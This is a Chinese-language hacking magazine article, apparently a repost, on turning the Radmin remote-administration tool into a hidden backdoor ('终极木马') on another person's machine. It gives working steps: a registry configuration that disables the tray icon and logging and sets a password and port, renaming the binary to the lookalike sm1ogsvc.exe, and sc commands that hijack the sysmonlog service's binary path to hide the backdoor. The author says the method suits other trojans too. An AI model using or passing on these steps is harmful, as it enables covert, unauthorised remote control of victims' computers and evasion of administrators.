真正的黑客是不拿定金的吗免费接单黑客QQ
BY 剑心[B.C.T][已经发表于黑客x档案] 首先说说Radmin,Radmin真是个好东西,我也是最近才发现这个东西的好处,譬如不被杀,管理很方便,速度也很快,配置简单……反正我是看到很多管理员就是选用的这个。尽管是个好东西,缺点还是有的,譬如那个服务名就很显眼,进程里的那个R_server.exe更是被人见到就杀,现在一个最菜的管理员也知道用任务管理器去查杀进程,配置的时候如果出错也很容易被发现,他的那个图标也很有个性,有个性就容易被发现,还有就是有人抱怨那个服务名总是R_server在服务管理器里很是显眼……但是,本着我对Radmin的热爱,还是要把这个好东西从管理员的眼皮底下挽救回来,改造成属于自己的终极木马,至于如何挽救这个好马那就跟我来看看吧!首先说说配置,然后是隐藏。配置我想不用多说,以前黑x有文章已经说得很清楚了,网管想看到的东西你不要让他看到就可以了。我们知道Radmin只需要R_Server.exe,AdmDll.dll和raddrv.dll这三个文件就可以安装,所以你首先要将这几个文件传到对方机器上,嫌麻烦的话后面有好的办法。至于Radmin的配置,可以先在自己的机器上配置好然后导出[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]下的内容,传到别人机器上导入,Radmin就跟你机器上配置的一样了,因为Radmin服务依赖的东西都在这个项下面。注意的几个是不要任务栏显示,不要日志记录,然后修改自己的密码什么的基本就可以了。我配置的如下:[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]"NTAuthEnabled"=hex:00,00,00,00"Parameter"=hex:fc,e2,fe,2b,e9,24,fd,11,67,bd,be,3b,5c,e1,ac,8b"Port"=hex:8b,05,00,00"Timeout"=hex:0a,00,00,00"EnableLogFile"=hex:00,00,00,00"LogFilePath"="c:\\logfile.txt""FilterIp"=hex:00,00,00,00"DisableTrayIcon"=hex:01,00,00,00"AutoAllow"=hex:00,00,00,00"AskUser"=hex:00,00,00,00"EnableEventLog"=hex:00,00,00,00这样配置的密码是jnc,端口是1419,不要急,具体的注册表文件config.reg已经带在后面了,想修改自己的密码和端口的话可以从自己机器上找到相应的注册表键值替换就OK了。但是注意,Radmin是从这个键值下读取相应的参数,所以每次用rededit -s导入注册表的时候,要先停服务然后启动服务才有效的。什么,你不知道怎么安装radmin,自己看以前的文章去!好了,配置就说这么多,这样配置的尽管不会被普通的用户发现,但是上面的几个缺点也都出来了,稍微有一点经验的管理员就很可以发现。关于服务隐藏以前魔女的条件也说过,但是不是很行得通,她是想把系统的剪贴薄删掉,然后把自己的Radmin伪装成剪贴薄,看起来是很好,可是事实上呢?我不说删除clipsrv.exe时系统弹出来的那个文件保护对话框没有办法解决,如图一。还有就是你的服务显示名称可以伪装,但是服务名还是R_server,这个没有办法变的,很容易被识破。我们可以不删除服务然后替换而是直接将系统的服务的本质改成我们的,但是让其他的譬如服务名等都不做任何变化,不了解内幕的人是很难看出来的。下面我们就将Radmin隐藏到系统的服务里面,我们将他的可执行文件路径改了就行了的。不只是Radmin,其他的后门如木马,还有Tcmd等他们本身默认安装的隐蔽性并不是很好,但是可以通过类似的方法来改造。首先是选我们要代替哪个服务,这里我推荐用那些不依赖其他任何服务就能自己启动的服务,否则会出现不能顺利启动的情况,当然也不能被其他人所依赖了,人家系统挂了就完了:)。那些用svchost.exe的就不要看了,呵呵。这里我推荐sysmonlog服务,就是那个"配置性能日志和警报"服务,符合我们的条件并且还不会被一般的管理员所注意,看看我如何做的吧。假设我们已经安装了Radmin,注册表文件已经导入,现在的Radmin的程序名字还是R_server.exe,在系统目录下。我们停掉Radmin服务后先把他的名字改成sm1ogsvc.exe。为什么改成这个?呵呵,不觉得1和l很像么?好了,改名之后我们可以来替换了。Sc这个工具知道吧,用以下的命令:sc config sysmonlog start= auto \\将"配置性能日志和警报"服务设置成自启动,没有什么疑点吧?\\sc config sysmonlog binpath= "c:\winnt\system32\sm1ogsvc.exe /service" \\修改其二进制路径,其实就是我们伪装的Radmin\\net start sysmonlog \\启动服务,Radmin又开始工作啦
(责任编辑:网络)